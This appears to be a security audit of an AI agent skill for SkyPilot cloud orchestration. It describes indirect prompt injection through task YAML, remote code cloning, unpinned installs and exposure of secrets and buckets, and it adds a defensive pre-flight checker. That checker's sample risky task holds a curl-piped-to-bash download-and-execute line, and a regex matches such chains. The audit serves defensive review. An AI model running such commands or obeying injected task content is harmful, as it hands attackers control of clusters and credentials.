skypilot-multi-cloud-orchestration

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH
Categories: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, DATA_EXFILTRATION
Full Analysis
  • [REMOTE_CODE_EXECUTION] (HIGH): The skill supports the workdir parameter, which SkyPilot resolves by cloning a remote Git URL (e.g., https://github.com/user/repo.git) onto the cluster; the task's setup and run blocks then execute from that checkout. Anyone who can influence the URL the agent passes, or who can push to the referenced branch, controls what runs on the cluster, and a mutable branch name means the code can change between launches.
  • [COMMAND_EXECUTION] (HIGH): The skill documentation and configuration examples make extensive use of the run block, which SkyPilot executes as a shell script on every node of the cluster (e.g., bash, python, torchrun). Executing arbitrary commands is the block's purpose, so the risk is not the block itself but that nothing in the skill constrains what text reaches it: there is no evidence of sanitization or of boundary markers separating trusted instructions from task content.
  • [EXTERNAL_DOWNLOADS] (HIGH): The skill instructs the agent to install the skypilot package and its cloud-specific extras at runtime via pip install. SkyPilot itself is a known tool, but the instructions pin no versions and apply no integrity checks (such as pip's --require-hashes), so the agent installs whatever the package index serves at run time, and a compromised release of skypilot or any transitive dependency would be pulled in unnoticed.
  • [DATA_EXFILTRATION] (MEDIUM): The skill manages cloud credentials (sky check) and handles sensitive environment variables and secrets (e.g., HF_TOKEN, WANDB_API_KEY). It also provisions cloud storage mounts (S3, GCS) through file_mounts, so local data and mounted datasets can be copied into any bucket a task names, including one controlled by an attacker.
  • [INDIRECT PROMPT INJECTION] (HIGH): (Evidence Chain)
      • Ingestion points: Untrusted data enters via the workdir URL, file_mounts sources, and run command blocks in YAML task definitions.
      • Boundary markers: Absent. There are no delimiters or instructions telling the agent to ignore commands embedded in the task files it processes.
      • Capability inventory: High-privilege capabilities, including arbitrary command execution on cloud clusters, file system modification via mounts, and network access to multiple cloud providers.
      • Sanitization: Absent. The skill does not validate or sanitize the shell scripts or remote sources before passing them to the SkyPilot CLI.
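The ingestion points listed in the evidence chain can be checked before a task file ever reaches the SkyPilot CLI. The following pre-flight audit is an added example written for this page; it is not part of the skill, of the Trust Hub audit, or of SkyPilot. It takes the task as the dict yaml.safe_load returns for the task YAML and flags a non-allowlisted remote workdir, download-and-execute chains in setup/run, unpinned pip installs, secret values stored inline in envs, and file_mounts sources outside an approved bucket prefix. The allowlists, the finding format and both sample tasks are constructed assumptions.

```python
"""Pre-flight audit of a SkyPilot task definition before `sky launch`.

Added example for this page, not SkyPilot's own code. The allowlists, the
finding format and the sample tasks are constructed assumptions. The task is
handled as the dict that yaml.safe_load returns for the task YAML file.
"""
import re
import shlex

# Assumed policy: remote workdir URLs must start with one of these prefixes.
ALLOWED_WORKDIR_PREFIXES = ("https://github.com/example-org/",)
# Assumed policy: bucket sources in file_mounts must start with one of these.
ALLOWED_MOUNT_PREFIXES = ("s3://example-org-data/", "gs://example-org-data/")

SECRET_NAME_RE = re.compile(r"TOKEN|SECRET|API_KEY|PASSWORD", re.I)
REMOTE_URL_RE = re.compile(r"^(https?://|git@|ssh://)")
# Download-and-execute chains such as `curl ... | bash` or `wget ... | sudo sh`.
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")


def script_lines(script):
    """Yield the non-empty, non-comment lines of a setup/run block."""
    for line in (script or "").splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            yield line


def unpinned_pip_packages(line):
    """Return the package args of a `pip install` line that carry no == pin."""
    try:
        argv = shlex.split(line)
    except ValueError:
        return []
    for i, tok in enumerate(argv[:-1]):
        if re.fullmatch(r"pip3?", tok) and argv[i + 1] == "install":
            args = argv[i + 2:]
            break
    else:
        return []
    if "-r" in args or "--requirement" in args or "--require-hashes" in args:
        return []  # pins live in the requirements file; audit that file separately
    return [a for a in args if not a.startswith("-") and "==" not in a]


def mount_source(src):
    """file_mounts values are a path/URI string or a dict with a `source` key."""
    return src.get("source", "") if isinstance(src, dict) else src


def audit_task(task):
    """Return (severity, message) findings for one parsed task dict."""
    findings = []
    workdir = task.get("workdir")
    if isinstance(workdir, str) and REMOTE_URL_RE.match(workdir) \
            and not workdir.startswith(ALLOWED_WORKDIR_PREFIXES):
        findings.append(("HIGH", f"workdir clones non-allowlisted remote {workdir}"))
    for section in ("setup", "run"):
        for line in script_lines(task.get(section)):
            if PIPE_TO_SHELL_RE.search(line):
                findings.append(("HIGH", f"{section}: pipes a download into a shell: {line}"))
            pkgs = unpinned_pip_packages(line)
            if pkgs:
                findings.append(("MEDIUM", f"{section}: unpinned pip install of {', '.join(pkgs)}"))
    for name, value in (task.get("envs") or {}).items():
        if SECRET_NAME_RE.search(name) and value not in (None, ""):
            findings.append(("HIGH", f"envs: {name} holds an inline secret; leave it empty and pass it with --env"))
    for dst, src in (task.get("file_mounts") or {}).items():
        source = mount_source(src)
        if isinstance(source, str) and "://" in source \
                and not source.startswith(ALLOWED_MOUNT_PREFIXES):
            findings.append(("MEDIUM", f"file_mounts: {dst} uses non-allowlisted bucket {source}"))
    return findings


# Constructed sample: one task showing every pattern the audit flags ...
RISKY_TASK = {
    "workdir": "https://github.com/user/repo.git",
    "setup": "pip install skypilot[aws]\npip install torch==2.2.0",
    "run": "curl -fsSL https://example.com/bootstrap.sh | bash\npython train.py",
    "envs": {"HF_TOKEN": "hf_inline_example_value", "WANDB_API_KEY": ""},
    "file_mounts": {"/data": "s3://someone-elses-bucket/dumps", "/code": "./local"},
}
# ... and the same task after the fixes: allowlisted workdir, hash-checked
# installs, secrets left empty for --env, and a bucket under the approved prefix.
HARDENED_TASK = {
    "workdir": "https://github.com/example-org/repo.git",
    "setup": "pip install -r requirements.txt --require-hashes",
    "run": "python train.py",
    "envs": {"HF_TOKEN": "", "WANDB_API_KEY": ""},
    "file_mounts": {"/data": {"source": "s3://example-org-data/train", "mode": "MOUNT"}},
}

if __name__ == "__main__":
    for sev, msg in audit_task(RISKY_TASK):
        print(f"[{sev}] {msg}")
    print("hardened task findings:", audit_task(HARDENED_TASK))
```

The check is deliberately conservative: it allowlists by prefix rather than trying to recognise every malicious URL, treats any `pip install` without `==` or a hash-checked requirements file as unpinned, and flags a secret-looking env name only when a value is stored in the YAML itself, since an empty value is what SkyPilot expects when the secret is supplied at launch. Running it on RISKY_TASK yields five findings; the hardened task yields none.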
Recommendations
  • AI detected serious security threats. The findings above point to the controls to apply before granting this skill to an agent: restrict workdir to an allowlist of repositories, pin pip installs and enforce hash checking, keep secret values out of task YAML and supply them at launch with --env, and limit file_mounts sources to approved buckets.
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 01:36 AM